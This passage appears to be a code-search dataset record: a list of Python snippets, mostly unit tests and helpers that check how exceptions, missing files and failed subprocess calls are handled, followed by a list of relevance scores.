Sometimes\n # it does, in which case the original exception was WindowsError\n # (which is a subclass of OSError).\n return exc.errno in (errno.EPERM, errno.EACCES) or \\\n getattr(exc, \"winerror\", -1) in (cext.ERROR_ACCESS_DENIED,\n cext.ERROR_PRIVILEGE_NOT_HELD)", "def test_nonexistent_path():\r\n with pytest.raises(RuntimeError):\r\n Image(os.path.join(current_dir, \"0--0.jpg\")).read_all()\r\n assert check_md5(path, jpg_path), \"The file has been changed when reading\"", "def testTempDirOrininalErrorRaised(self):\n self.Patch(os, \"chmod\")\n self.Patch(tempfile, \"mkdtemp\", return_value=\"/tmp/tempdir\")\n expected_error = OSError(\"Expected OS Error\")\n self.Patch(shutil, \"rmtree\", side_effect=expected_error)\n\n class ExpectedException(Exception):\n \"\"\"Expected exception.\"\"\"\n\n def _Call():\n with utils.TempDir():\n raise ExpectedException(\"Expected Exception\")\n\n # Verify.\n # ExpectedException should be raised, and OSError\n # should not be raised.\n self.assertRaises(ExpectedException, _Call)\n tempfile.mkdtemp.assert_called_once() #pylint: disable=no-member\n shutil.rmtree.assert_called_with(\"/tmp/tempdir\") #pylint: disable=no-member", "def test_handles_error(self):\n with self.assertRaises(ForcedExit):\n self.run_command(mkdtemp())\n\n self.assertResults(\n result_with_hint(\n u'This repository has not been initialized.',\n GIT_REPO_NOT_INITIALIZED),\n self.error)", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n BaseErrorExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def check_os():\n\n if platform.system() != \"Darwin\":\n print \"This script only works on macos system\"\n exit(1)", "def test_cmd_error(self):\n task = Task(\"uid\", False, False, \"does_not_exist\", None, \".\")\n task._checkpoint_dir = tmp_checkpoint_dir()\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's command:.*\"):\n task.run()\n task.shell = True\n with self.assertRaisesRegexp(RuntimeError, \".*executing Task's command:.*\"):\n task.run()\n task._dry_run = True\n task.run() # No longer raises RuntimeError", "def test_normal_use(self):\n # Setup:\n class DatabaseError(Exception):\n pass\n\n # Python 2 and 3:\n from future.utils import raise_from\n\n class FileDatabase:\n def __init__(self, filename):\n try:\n self.file = open(filename)\n except IOError as exc:\n raise_from(DatabaseError('failed to open'), exc)\n\n # Testing the above:\n try:\n fd = FileDatabase('non_existent_file.txt')\n except Exception as e:\n assert isinstance(e.__cause__, IOError) # FileNotFoundError on\n # Py3.3+ inherits from IOError", "def check_result(ec):\r\n # NOTE: This will break some oscilloscopes that are powered by USB.\r\n # Some of the newer scopes, can actually be powered by USB and will\r\n # return a useful value. 
That should be given back to the user.\r\n # I guess we can deal with these edge cases in the functions themselves\r\n if ec == 0:\r\n return\r\n\r\n else:\r\n ecName = error_num_to_name(ec)\r\n ecDesc = error_num_to_desc(ec)\r\n raise IOError('Error calling %s: %s (%s)' % (\r\n str(inspect.stack()[1][3]), ecName, ecDesc))", "def test_the_main_non_existent_file(self):\r\n with self.assertRaises(SystemExit):\r\n the_main_function(\"non existent file\")", "def test_is_information_written_through_stderr_methods(self):\n\n io = BufferedSystemIO()\n io._stdout = lambda *args, **kwargs: None\n\n try:\n raise IndexError('Invalid index 5')\n except Exception as exc:\n output_formatted_exception(exc, ':my-test-task', io)\n\n self.assertIn('IndexError', io.get_value())\n self.assertIn('Invalid index 5', io.get_value())\n self.assertIn('Retry with \"-rl debug\" switch before failed task to see stacktrace', io.get_value())", "def test_raises_error_on_hostnotfound(self):\n self.mock_getaddrinfo.side_effect = socket.gaierror('error_message')\n return_value = None\n with self.assertRaises(CMDLineExit) as cm:\n return_value = sanitize_host('erroneous_host')\n self.assertIsNone(return_value)\n self.assertEqual(\n cm.exception.args[0],\n 'Could not resolve hostname \\'erroneous_host\\': error_message')\n self.mock_getaddrinfo.assert_called_once_with(\n 'erroneous_host', 443, socket.AF_INET, socket.SOCK_STREAM)\n self.mock_gethostbyaddr.assert_not_called()", "def run_or_die(command):\n (status, stdio) = commands.getstatusoutput(command)\n if status != 0:\n raise Exception(\"command '%s' failed with exit status %d and output '%s'\" % (command, status, stdio))\n return stdio", "def test_simple_source_constructor_exception():\n TESTPATH = \"/usr/local/share/testfile.mp3\"\n with pytest.raises(robox.RDJResourceErr):\n test01 = Source(path=TESTPATH, exist=True)", "def error_check(command):\r\n\r\n # TODO\r", "def errorCheck(sh, returncode, stderr):\n\tif returncode!=0 or stderr!='':\n\t\tif config.DEBUG:\n\t\t\tmsg = \"sh code execution [%s] returned non-zero exit status [%s] and/or non-empty stdterr [%s]\" % (repr(sh), returncode, repr(stderr.strip()))\n\t\telse:\n\t\t\tmsg = \"sh code execution returned non-zero exit status and/or non-empty stdterr\"\n\t\traise Exception(msg)", "def test_bad_file():\n\n bad = ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))\n rv, out = getstatusoutput(f'{prg} -f {bad}')\n assert rv != 0\n assert re.match('usage:', out, re.I)\n assert re.search(f\"No such file or directory: '{bad}'\", out)", "def test_invoke_pipe_not_found():\n\n testapp = holocron.Application()\n\n with pytest.raises(ValueError) as excinfo:\n next(testapp.invoke(\"test\"))\n\n assert str(excinfo.value) == \"no such pipe: 'test'\"", "def test_not_running(): # pragma: windows\n comm_kwargs = dict(comm='IPCComm', direction='send', reverse_names=True)\n nt.assert_raises(RuntimeError, new_comm, 'test', **comm_kwargs)", "def test_mount_failure(self):\n with prepared_image_file(create_filesystem=False):\n program = RsyncSystemBackup(\n crypto_device=CRYPTO_NAME,\n destination=os.path.join(MOUNT_POINT, 'latest'),\n mount_point=MOUNT_POINT,\n )\n # When `mount' fails it should exit with a nonzero exit code,\n # thereby causing executor to raise an ExternalCommandFailed\n # exception that obscures the FailedToMountError exception that\n # we're interested in. 
The check=False option enables our\n # `last resort error handling' code path to be reached.\n program.destination_context.options['check'] = False\n self.assertRaises(FailedToMountError, program.execute)", "def _try_ignoring_ent_and_perm(func, *args, **kwargs):\n try:\n func(*args, **kwargs)\n except OSError as err:\n if err.errno == errno.ENOENT or err.errno == errno.EPERM:\n return\n else:\n raise err", "def test_nonexistent_path(tmpdir):\n with pytest.raises(IOError):\n checksum(tmpdir.join(\"does-not-exist.txt\").strpath)", "def exitIfFileDescriptorError(exit_code, device):\n if exit_code == ExitCode.FILE_DESCRIPTOR_ERROR:\n logging.critical(\"Cannot access to %s.\", device)\n sys.exit(ExitCode.FILE_DESCRIPTOR_ERROR)", "def test_open_image_throws(self):\n self.expect_open_image(\n 'SomeBlobKey',\n throw_exception=apiproxy_errors.ApplicationError(\n images_service_pb.ImagesServiceError.INVALID_BLOB_KEY))\n self.mox.ReplayAll()\n try:\n self.app._transform_image('SomeBlobKey', '')\n raise self.failureException('Should have thrown ApplicationError')\n except apiproxy_errors.ApplicationError:\n pass\n self.mox.VerifyAll()", "def onerror(func, path, exc_info):\n import stat\n if not os.path.exists(path):\n pass\n elif not os.access(path, os.W_OK):\n # Is the error an access error ?\n os.chmod(path, stat.S_IWUSR)\n func(path)\n else:\n raise", "def test_fetch_py_err():\n ident = _id()\n entry_dir = os.path.join(basedir, 'always_error', ident)\n res = proj.fetch('always_error', ident)\n assert res.result is None\n paths = ['error.log', 'status', 'run.log', 'start_time', 'end_time']\n for p in paths:\n assert os.path.exists(os.path.join(entry_dir, p))\n with open(res.paths['log']) as fd:\n assert 'output here' in fd.read()\n with open(res.paths['error']) as fd:\n assert 'This is an error!' 
in fd.read()\n with open(res.paths['status']) as fd:\n status = fd.read()\n assert status == 'error'\n assert res.status == status\n with open(res.paths['start_time']) as fd:\n start_time = int(fd.read())\n with open(res.paths['end_time']) as fd:\n end_time = int(fd.read())\n assert start_time <= end_time", "def test_exc(self):\n g = h5g.open(self.fid, '/')\n g._close()\n self.assertRaises(ValueError, h5i.get_file_id, g)", "def test_raise_error_unknown_file():\n\n options = {'input_files': ['Sparta.lol']}\n\n with pytest.raises(KeyError) as excinfo:\n process.Packager(options)\n excinfo.match(r'File ([a-zA-Z_\\.\\'].*) not found in file list.')", "def shellExecErrorCode(cmd):\n return subprocess.call(cmd, shell=True)", "def test_init(self):\n nt.assert_raises(Exception, CisInterface.CisOutput, 'error')", "def has_errors_fatal(self) -> bool:", "def test_raise_exception(self):\n with self.assertRaises(Exception):\n SshCommandBuilder(SERVER_USER, COMMAND).to_build()", "def test_invalidFile(self):\n self.assertRaises(cesmEnvLib.checkFile(\"blah\", \"write\"))", "def test_extract_raises(capsys):\n with mock.patch('uflash.extract', side_effect=RuntimeError(\"boom\")):\n with pytest.raises(SystemExit):\n uflash.main(argv=['--extract', 'test.py'])\n\n _, stderr = capsys.readouterr()\n expected = 'Error extracting test.py'\n assert expected in stderr", "def testTempDirWhenDeleteEncounterError(self):\n self.Patch(os, \"chmod\")\n self.Patch(tempfile, \"mkdtemp\", return_value=\"/tmp/tempdir\")\n expected_error = OSError(\"Expected OS Error\")\n self.Patch(shutil, \"rmtree\", side_effect=expected_error)\n\n def _Call():\n with utils.TempDir():\n pass\n\n # Verify OSError should be raised.\n self.assertRaises(OSError, _Call)\n tempfile.mkdtemp.assert_called_once() #pylint: disable=no-member\n shutil.rmtree.assert_called_with(\"/tmp/tempdir\") #pylint: disable=no-member", "def look_for_cython_error(capfd):\n yield\n _, err = capfd.readouterr()\n assert \"Exception ignored\" not in err", "def test_stats_issue_43328(test_file):\n fake_file = test_file.parent / \"fake.file\"\n with pytest.raises(CommandExecutionError):\n win_file.stats(fake_file)", "def test_bad_file():\n\n bad_file = random_string()\n letter = random.choice(string.ascii_lowercase)\n rv, out = getstatusoutput('{} {} -f {}'.format(prg, letter, bad_file))\n assert rv != 0\n expected = \"No such file or directory: '{}'\".format(bad_file)\n assert re.search(expected, out)", "def test_check_if_not_error(self):\n actual_result = SshpassErrorExitCodeController(OK_RETURN_CODE,\n OK_MESSAGE)\\\n .check_if_error()\n self.assertIsNone(actual_result)", "def test_sign_file_unknown_error(dummy_command, tmp_path):\n # Raise an unknown error during codesign\n dummy_command.tools.subprocess.run.side_effect = mock_codesign(\"Unknown error\")\n\n with pytest.raises(BriefcaseCommandError, match=\"Unable to code sign \"):\n dummy_command.sign_file(\n tmp_path / \"base_path\" / \"random.file\",\n identity=\"Sekrit identity (DEADBEEF)\",\n )\n\n # An attempt to codesign was made\n dummy_command.tools.subprocess.run.assert_has_calls(\n [\n sign_call(\n tmp_path,\n tmp_path / \"base_path\" / \"random.file\",\n entitlements=False,\n ),\n ],\n any_order=False,\n )", "def test_bytes_to_intel_hex_io_error(mock_string_io, mock_stderr):\n data = [1, 2, 3, 4, 5]\n mock_string_io.return_value.write.side_effect = IOError()\n\n result = cmds._bytes_to_intel_hex(data=data)\n\n assert result is None\n assert mock_stderr.call_count == 1", "def FileCheck(fn):\n try:\n open(fn, 
\"r\")\n return 1\n except IOError:\n print(\"Error: File does not exist.\")\n return 0", "def test_execute_or_bail_internal_error(self):\n with self.assertLogs(level=\"INFO\") as cm:\n # This patches the \"croak\" function that is IMPORTED inside \"etl.commands\".\n with unittest.mock.patch(\"etl.commands.croak\") as mocked_croak:\n with etl.commands.execute_or_bail(\"unittest\"):\n # Simulate an internal error where we don't catch an exception.\n raise ValueError(\"oops\")\n mocked_croak.assert_called()\n # The exit code (2nd arg) is expected to be 3 for uncaught exceptions.\n self.assertEqual(mocked_croak.call_args[0][1], 3)\n\n self.assertEqual(len(cm.output), 2)\n self.assertIn(\"terrible happened\", cm.output[0])", "def unexpected_error(self, exception):", "def test_with_empty_args(self, mock_builtins_open, capsys, prog, main):\n with pytest.raises(SystemExit):\n main()\n _, err = capsys.readouterr()\n assert err.startswith('usage: {}'.format(prog))", "def _check_error(self, ipi):\n\n ipi_error = ipi.communicate(timeout=120)[1].decode(\"ascii\")\n assert \"\" == ipi_error, \"IPI ERROR OCCURED: {}\".format(ipi_error)", "def test_not_exectuable(self):\n (status, output, imlog, makelog) = \\\n self.run_instmake_build(log_prefix=\"not-executable\",\n make_opts=[\"not-executable\"])\n\n self.assertEqual(status, util.SUCCESS, output)", "def test_broken_error_module(self):\r\n with self.assertRaises(TestException):\r\n module = self.descriptor._xmodule", "def isexe(fpath):\n return path.exists(fpath) and access(fpath, X_OK)", "def test_check_module(self) -> None:\n check_module(\"os\")", "def test_invalid_dir(self):\n self.assertRaises(OSError, awstats_reader.AwstatsReader, '/tmp/XYZ', 'example.com')", "def test_valid_file_raises():\n with pytest.raises(ValueError):\n cli._valid_file(__file__)", "def NotADirectoryError(inst):\n return hasattr(inst, 'errno') and inst.errno == errno.ENOTDIR", "def test_raise_if_err_ok(self) -> None:\n assert Ok(2).raise_if_err(\"err\") == 2", "def test_check_if_error_six(self):\n with self.assertRaises(MyError):\n SshpassErrorExitCodeController(6, ERROR_MESSAGE)\\\n .check_if_error()", "def test_read_no_file():\n filename = 'asdf'\n with pytest.raises(FileNotFoundError):\n read_file(filename)", "def test_broken_error_descriptor(self):\r\n with self.assertRaises(TestException):\r\n module = self.descriptor._xmodule", "def test_driver_from_file_errors(execute_kwargs_py):\n with pytest.raises(errors.MapcheteDriverError):\n driver_from_file(execute_kwargs_py)\n\n with pytest.raises(FileNotFoundError):\n driver_from_file(\"non_existing_file.tif\", quick=False)", "def test_fail_flow_invalid_distro(self):\n # make the mock for SshShell fail to execute commands\n self._mock_ssh_shell.run.return_value = (1, 'command not found')\n\n # instantiate the guest class we want to test\n system_name = 'dummy_system'\n host_name = 'dummy.domain.com'\n user = 'root'\n passwd = 'somepwd'\n extensions = {}\n guest_obj = linux.GuestLinux(\n system_name, host_name, user, passwd, extensions)\n\n # check if correctly raises the exception\n self.assertRaises(ConnectionError, guest_obj.login)\n\n # change the mock now to successfully execute the command but report an\n # incorrect kernel name\n self._mock_ssh_shell.run.return_value = (\n 0,\n 'OtherOS dummy 4.4.6 #1 SMP Wed Mar 16 22:13:40 UTC 2016 x86_64 '\n 'x86_64 x86_64 Some/OS'\n )\n guest_obj = linux.GuestLinux(\n system_name, host_name, user, passwd, extensions)\n\n # check if correctly raises the exception\n 
self.assertRaisesRegex(\n ConnectionError, '^Target system is not Linux$', guest_obj.login\n )", "def on_error(func, path, exc_info):\n import stat\n if not os.access(path, os.W_OK):\n # Is the error an access error ?\n os.chmod(path, stat.S_IWUSR)\n func(path)\n else:\n raise", "def handle_ioexception(self, exception):\n return True" ]
[ "0.7091949", "0.68408364", "0.6782386", "0.6650079", "0.66032916", "0.6333252", "0.6230165", "0.6217626", "0.61586803", "0.6140074", "0.60988116", "0.6090791", "0.6002094", "0.60008836", "0.598052", "0.5965969", "0.5965969", "0.59647274", "0.595298", "0.59336317", "0.59047925", "0.58992267", "0.5898923", "0.5870315", "0.58648866", "0.5844375", "0.5834275", "0.5806941", "0.58029044", "0.57923126", "0.57725996", "0.5769801", "0.57650244", "0.5756039", "0.57545274", "0.5749916", "0.5742899", "0.57342035", "0.5730068", "0.5720979", "0.57176006", "0.5697197", "0.56777006", "0.56688285", "0.5658031", "0.5654664", "0.5649373", "0.5642489", "0.5634441", "0.56309235", "0.5628874", "0.56259507", "0.5625503", "0.5622651", "0.5610448", "0.561016", "0.56099075", "0.560556", "0.55936867", "0.55932784", "0.5592612", "0.5582704", "0.5576372", "0.55696994", "0.55675554", "0.55628127", "0.5558178", "0.55575484", "0.5552635", "0.55525124", "0.5551288", "0.5549888", "0.55413485", "0.55366796", "0.55298406", "0.55283195", "0.55251056", "0.5515913", "0.54934394", "0.5493312", "0.54880226", "0.54828364", "0.54690677", "0.5466026", "0.54597986", "0.5459236", "0.5453509", "0.5445545", "0.54430455", "0.5430554", "0.5422081", "0.5420834", "0.5419391", "0.5418308", "0.5417813", "0.5409733", "0.5408553", "0.54080474", "0.5403379", "0.5398198" ]
0.65513504
5
Test what happens when a CalledProcessError is raised (usually means isort hit an error).
def test_isort_tool_plugin_scan_calledprocesserror(mock_subprocess_check_output): mock_subprocess_check_output.side_effect = subprocess.CalledProcessError( 0, "", output="mocked error" ) itp = setup_isort_tool_plugin() package = Package( "valid_package", os.path.join(os.path.dirname(__file__), "valid_package") ) package["python_src"] = [ os.path.join(os.path.dirname(__file__), "valid_package", "sample.py") ] issues = itp.scan(package, "level") assert len(issues) == 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_make_tool_plugin_scan_calledprocesserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = subprocess.CalledProcessError(1, '', output=\"mocked error\")\n mtp = setup_make_tool_plugin()\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n package['make_targets'] = 'make_targets'\n issues = mtp.scan(package, 'level')\n assert not issues", "def check_call(*args, **kwargs):\n rc = call(*args, **kwargs)\n if rc != 0:\n cmd = kwargs.get(\"args\")\n if cmd is None:\n cmd = args[0]\n raise CalledProcessError(rc, cmd)\n return 0", "def test_dump_handles_oserror(mocker):\n mocker.patch('subprocess.Popen' , side_effect=OSError(\"no such file\"))\n with pytest.raises(SystemExit):\n pgdump.dump(url)", "def called_process_error2exit_decorator(func):\n @functools.wraps(func)\n def func_wrapper(*args, **kwargs):\n try:\n func(*args, **kwargs)\n except subprocess.CalledProcessError as e:\n print(\"{err}:\\n{msg}\".format(err=str(e), msg=e.output))\n sys.exit(1)\n return func_wrapper", "def test_dump_handles_os_error(mocker):\n\tmocker.patch('subprocess.Popen', side_effect=OSError('no such file'))\n\twith pytest.raises(SystemExit):\n\t\tpgdump.dump(url)", "def test_start_args(self, mocked_check, mocked_proc):\n from supvisors.rpcinterface import RPCInterface\n # prepare context\n info_source = self.supervisor.supvisors.info_source\n info_source.update_extra_args.side_effect = KeyError\n info_source.supervisor_rpc_interface.startProcess.side_effect = [\n RPCError(Faults.NO_FILE, 'no file'),\n RPCError(Faults.NOT_EXECUTABLE),\n RPCError(Faults.ABNORMAL_TERMINATION),\n 'done']\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with extra arguments and a process that is not compliant\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', 'dummy arguments')\n self.assertEqual(Faults.BAD_EXTRA_ARGUMENTS, exc.exception.code)\n self.assertEqual(\"BAD_EXTRA_ARGUMENTS: rules for namespec appli:proc\"\n \" are not compatible with extra arguments in command line\",\n exc.exception.text)\n self.assertEqual(0, mocked_check.call_count)\n self.assertEqual(0, info_source.update_extra_args.call_count)\n self.assertEqual(0, info_source.supervisor_rpc_interface.startProcess.call_count)\n # test RPC call with extra arguments and a process that is compliant\n # but unknown in Supervisor\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', 'dummy arguments')\n self.assertEqual(Faults.BAD_NAME, exc.exception.code)\n self.assertEqual(\"BAD_NAME: namespec appli:proc unknown in this Supervisor instance\",\n exc.exception.text)\n self.assertEqual([call('appli:proc', 'dummy arguments')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual(0, info_source.supervisor_rpc_interface.startProcess.call_count)\n info_source.update_extra_args.reset_mock()\n info_source.update_extra_args.side_effect = None\n # test RPC call with start exceptions\n mocked_proc.side_effect = None\n mocked_proc.return_value = None, None\n # NO_FILE exception triggers an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc')\n self.assertEqual(Faults.NO_FILE, exc.exception.code)\n self.assertEqual(\"NO_FILE: no file\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', True)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n 
self.assertEqual([call('appli:proc', 'NO_FILE: no file')],\n info_source.force_process_fatal.call_args_list)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.force_process_fatal.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # NOT_EXECUTABLE exception triggers an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', wait=False)\n self.assertEqual(Faults.NOT_EXECUTABLE, exc.exception.code)\n self.assertEqual(\"NOT_EXECUTABLE\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', False)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual([call('appli:proc', 'NOT_EXECUTABLE')],\n info_source.force_process_fatal.call_args_list)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.force_process_fatal.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # other exception doesn't trigger an update of the process state\n with self.assertRaises(RPCError) as exc:\n rpc.start_args('appli:proc', wait=False)\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual(\"ABNORMAL_TERMINATION\", exc.exception.text)\n self.assertEqual([call('appli:proc', '')],\n info_source.update_extra_args.call_args_list)\n self.assertEqual([call('appli:proc', False)],\n info_source.supervisor_rpc_interface.startProcess.call_args_list)\n self.assertEqual(0, info_source.force_process_fatal.call_count)\n # reset patches\n info_source.update_extra_args.reset_mock()\n info_source.supervisor_rpc_interface.startProcess.reset_mock()\n # finally, normal behaviour\n self.assertEqual('done', rpc.start_args('appli:proc'))", "def test_startProcessUnknownKeyError(self):\r\n self.assertRaises(KeyError, self.pm.startProcess, \"foo\")", "def test_not_running(): # pragma: windows\n comm_kwargs = dict(comm='IPCComm', direction='send', reverse_names=True)\n nt.assert_raises(RuntimeError, new_comm, 'test', **comm_kwargs)", "def sanity_check_process(self):\n assert_equals(self.proc.returncode, None)\n time.sleep(1)", "def print_unable_to_run(exc: \"CalledProcessError\"):\n _print(str(exc), level=MessageLevel.QUIET)", "def test_exceptions():\r\n # test that trying to connect_ to a non existent app fails\r\n try:\r\n app = application.Application()\r\n app.connect(path=r\"No process with this please\")\r\n assert False\r\n except application.ProcessNotFoundError:\r\n print('ProcessNotFoundError has been raised. OK.')\r\n\r\n # test that trying to connect_ to a non existent app fails\r\n try:\r\n app = application.Application()\r\n app.start(cmd_line = r\"No process with this please\")\r\n assert False\r\n except application.AppStartError:\r\n print('AppStartError has been raised. 
OK.')", "def test_runFailed(self):\n builder = BookBuilder()\n exc = self.assertRaises(\n CommandFailed, builder.run,\n [sys.executable, '-c', 'print \"hi\"; raise SystemExit(1)'])\n self.assertEquals(exc.exitStatus, 1)\n self.assertEquals(exc.exitSignal, None)\n self.assertEquals(exc.output, \"hi\\n\")", "def test_invoke_pipe_not_found():\n\n testapp = holocron.Application()\n\n with pytest.raises(ValueError) as excinfo:\n next(testapp.invoke(\"test\"))\n\n assert str(excinfo.value) == \"no such pipe: 'test'\"", "def check_call_out(args, **kwargs):\n out, returncode = communicate(args, **kwargs)\n if returncode:\n raise CalledProcessError(\n returncode, args, kwargs.get('cwd'), out[0], out[1])\n return out", "def test_unexpected_error_in_processor(self):\n\n one_process_workflow = \"\"\"file://B <- file://A ! buggy_processor\n echo A does not produce B\n \"\"\"\n process = run_first_process(one_process_workflow, BuggyProcessor())\n assert process.success is False, process.error_message\n assert process.error_message.find('An unexpected error have happen in tuttle processor '\n 'buggy_processor :') >= 0, process.error_message\n assert process.error_message.find('Traceback (most recent call last):') >= 0, process.error_message\n assert process.error_message.find('raise Exception(\"Unexpected error in processor\")') >= 0, process.error_message\n assert process.error_message.find('will not complete.') >= 0, process.error_message", "def test_subprocess_fork_pid0_exception(self, mocker):\n mocker.stopall()\n\n test_command = [\"who\", \"-b\"]\n test_name = \"test_who\"\n test_fork = True\n pid = 0\n\n # mock\n mock_logging_debug = mocker.MagicMock(name=\"mock_logging_debug\")\n mock_logging_error = mocker.MagicMock(name=\"mock_logging_error\")\n mock_os_fork = mocker.MagicMock(name=\"mock_os_fork\", side_effect=[pid, OSError])\n mock_sys_exit = mocker.MagicMock(name=\"mock_sys_exit\")\n mock_os_chdir = mocker.MagicMock(name=\"mock_os_chdir\")\n mock_os_setsid = mocker.MagicMock(name=\"mock_os_setsid\")\n mock_os_umask = mocker.MagicMock(name=\"mock_os_umask\")\n\n # patch\n mocker.patch.object(\n scarlett_os.subprocess.logging.Logger, \"debug\", mock_logging_debug\n )\n mocker.patch.object(\n scarlett_os.subprocess.logging.Logger, \"error\", mock_logging_error\n )\n mocker.patch.object(scarlett_os.subprocess.os, \"fork\", mock_os_fork)\n mocker.patch.object(scarlett_os.subprocess.sys, \"exit\", mock_sys_exit)\n mocker.patch.object(scarlett_os.subprocess.os, \"chdir\", mock_os_chdir)\n mocker.patch.object(scarlett_os.subprocess.os, \"setsid\", mock_os_setsid)\n mocker.patch.object(scarlett_os.subprocess.os, \"umask\", mock_os_umask)\n\n scarlett_os.subprocess.Subprocess(test_command, name=test_name, fork=test_fork)\n\n mock_logging_error.assert_any_call(\"Error forking process second time\")\n\n mocker.stopall()", "def unavailable_process(**kwargs):\n return LazySubprocessTester([sys.executable, \"-c\", \"import sys; sys.exit(1)\"], **kwargs)", "def test_execute_or_bail_internal_error(self):\n with self.assertLogs(level=\"INFO\") as cm:\n # This patches the \"croak\" function that is IMPORTED inside \"etl.commands\".\n with unittest.mock.patch(\"etl.commands.croak\") as mocked_croak:\n with etl.commands.execute_or_bail(\"unittest\"):\n # Simulate an internal error where we don't catch an exception.\n raise ValueError(\"oops\")\n mocked_croak.assert_called()\n # The exit code (2nd arg) is expected to be 3 for uncaught exceptions.\n self.assertEqual(mocked_croak.call_args[0][1], 3)\n\n 
self.assertEqual(len(cm.output), 2)\n self.assertIn(\"terrible happened\", cm.output[0])", "def test_get_case_command_fail(loqusdbapi, mocker):\n # GIVEN a loqusdb api and a case id\n case_id = 'a_case'\n # WHEN an error occurs during fetching a case with the adapter\n mocker.patch.object(subprocess, 'check_output')\n subprocess.check_output.side_effect = subprocess.CalledProcessError(1, 'error')\n\n # THEN assert that the error is raised\n with pytest.raises(subprocess.CalledProcessError):\n loqusdbapi.get_case(case_id)", "def test_subprocess_fails_with_no_command(self):\n with self.assertRaises(ValueError):\n LazySubprocessTester([])", "def test_missing_file(self):\n with self.assertRaises(subprocess.CalledProcessError) as cm:\n subprocess.check_output(\n [sys.executable, idf_py_path, '--version', '@args_non_existent'],\n env=os.environ,\n stderr=subprocess.STDOUT).decode('utf-8', 'ignore')\n self.assertIn('(expansion of @args_non_existent) could not be opened', cm.exception.output.decode('utf-8', 'ignore'))", "def test_use_exit_status(self): # suppress(no-self-use)\n subprocess.call.return_value = 1\n GreenTestCommand(Distribution()).run()\n sys.exit.assert_called_with(1)", "def test_runSignaled(self):\n builder = BookBuilder()\n exc = self.assertRaises(\n CommandFailed, builder.run,\n [sys.executable, '-c',\n 'import sys; print \"hi\"; sys.stdout.flush(); '\n 'import os; os.kill(os.getpid(), 9)'])\n self.assertEquals(exc.exitSignal, 9)\n self.assertEquals(exc.exitStatus, None)\n self.assertEquals(exc.output, \"hi\\n\")", "def test_check_if_error(self):\n with self.assertRaises(MyError):\n ExecutionExitCodeController(ERROR_RETURN_CODE, ERROR_MESSAGE)\\\n .check_if_error()", "def _handleExceptionAndCheckCall(array_call, **kwargs):\n stdout = kwargs.get('stdout', subprocess.PIPE)\n stderr = kwargs.get('stderr', subprocess.PIPE)\n shell = kwargs.get('shell', False)\n\n cmd = array_call[0]\n\n output = None\n error = None\n\n # TODO: Check the value of array_call and <=[0]\n logging.debug(\"Calling {0}:\".format(cmd))\n logging.debug(\"%s\", array_call)\n logging.debug(\"---------\")\n\n # TODO: Use universal_newlines option from Popen?\n try:\n p = subprocess.Popen(array_call, stdout=stdout,\n stderr=stderr, shell=shell)\n\n # TODO: Change this because of possible memory issues => https://docs.python.org/2/library/subprocess.html#subprocess.Popen.communicate\n\n output, error = p.communicate()\n\n if stdout == subprocess.PIPE:\n logging.debug(\"\\t{0}\".format(output))\n else:\n logging.debug(\"\\tOutput in file {0}\".format(stdout.name))\n # If we detect an error from the subprocess, then we raise an exception\n # TODO: Manage if we raise an exception for everything, or use CRITICAL etc... but not stop process\n # TODO: The responsability of returning a sys.exit() should not be there, but up in the app.\n if p.returncode:\n if stderr == subprocess.PIPE:\n raise PopenError(cmd, error, p.returncode)\n else:\n # TODO: To Handle properly with a design behind, if we received a option as a file for the error\n raise Exception(\"Error when calling {0}. Error as been logged in your file {1}. 
Error code: {2}\"\n .format(cmd, stderr.name, p.returncode))\n\n except OSError as e:\n message = \"The subprocess {0} has encountered an OSError: {1}\".format(\n cmd, e.strerror)\n if e.filename:\n message = '\\n'.join(\n (message, \", against this file: {0}\".format(e.filename)))\n logging.error(message)\n sys.exit(-1)\n except PopenError as p:\n message = \"The subprocess {0} has returned the error: {1}.\".format(\n p.cmd, p.return_code)\n message = '\\n'.join(\n (message, \"Its error message is: {0}\".format(p.error)))\n\n logging.exception(message)\n\n sys.exit(p.return_code)\n except Exception as e:\n message = \"The subprocess {0} has encountered an unknown error: {1}\".format(\n cmd, e)\n logging.exception(message)\n\n sys.exit(-1)\n return p", "def test_ns_fail():\n env = NsSimPyEnvironment()\n env.process(some_process(env, 10.1))\n env.run()", "def test_unexpected_error_in_exists(self):\n # TODO\n one_process_workflow = \"\"\"buggy://B <- file://A\n echo A produces B > B\n \"\"\"\n process = run_first_process(one_process_workflow, extra_resource=BuggyExistsResource)\n assert process.success is False, process.error_message\n assert process.error_message.find('An unexpected error have happen in tuttle while checking existence of '\n 'output resources' ) >= 0, process.error_message\n assert process.error_message.find('Traceback (most recent call last):') >= 0, process.error_message\n assert process.error_message.find('raise Exception(\"Unexpected error in exists()\")') >= 0, process.error_message\n assert process.error_message.find('Process cannot be considered complete.') >= 0, process.error_message", "def _handle_failure(self, proc, test_case):\n if proc.returncode != 0:\n print('ERROR: Test execution failed: {}'.format(test_case.get_name()))\n stdout, stderr = proc.communicate()\n raise TestCaseFailure('Test case {} failed. 
